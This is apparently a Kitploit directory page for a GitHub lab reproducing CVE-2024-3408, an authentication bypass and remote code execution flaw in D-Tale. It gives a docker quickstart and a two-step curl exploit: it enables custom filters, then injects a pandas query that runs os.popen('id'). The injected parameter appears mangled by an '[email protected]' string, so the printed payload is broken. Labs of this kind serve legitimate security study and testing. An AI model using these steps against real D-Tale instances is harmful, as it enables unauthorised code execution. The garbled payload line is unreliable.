Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-3408-dtale — Vuln lab for CVE-2024-3408 - D-Tale Authentication Bypass & RCE | Kitploit
Tools/GitHubGitHub/flame-11/cve-2024-3408-dtale
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubflame-11/cve-2024-3408-dtale

CVE-2024-3408-dtale

Vuln lab for CVE-2024-3408 - D-Tale Authentication Bypass & RCE

View Repository
28 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-3408 - D-Tale Authentication Bypass & RCE

Reproducible lab environment for CVE-2024-3408, an authentication bypass and remote code execution vulnerability in D-Tale.

Vulnerability

D-Tale versions up to 3.15.1 are vulnerable due to:

  1. Hardcoded SECRET_KEY ("Dtale") for Flask session signing - allows session cookie forgery
  2. Code execution via custom filters - the test-filter endpoint uses pandas query which can be abused to execute arbitrary Python code

CVSS: 9.8 (Critical)
Affected: D-Tale <= 3.15.1

Quickstart

root@kitploit:~
docker compose up -d --build

D-Tale will be available at http://localhost:40000

Validate

root@kitploit:~
# Step 1: Enable custom filters
curl -s "http://localhost:40000/dtale/update-settings/1?settings=%7B%22enable_custom_filters%22%3Atrue%7D"
# Expected: {"success":true}

# Step 2: Execute command via pandas query injection
curl -s -G "http://localhost:40000/dtale/test-filter/1" \
  --data-urlencode "[email protected].__import__('os').popen('id').read()"
# Expected: Response contains "uid=" and "gid=" (command output in error message)

Cleanup

root@kitploit:~
docker compose down

References

  • Huntr Report (CVE-2024-3408)
  • Huntr Report (CVE-2025-0655)
  • NVD
  • D-Tale GitHub

Disclaimer

This lab is for educational and authorized security testing purposes only. Do not use against systems you don't own or have permission to test.

Download Tool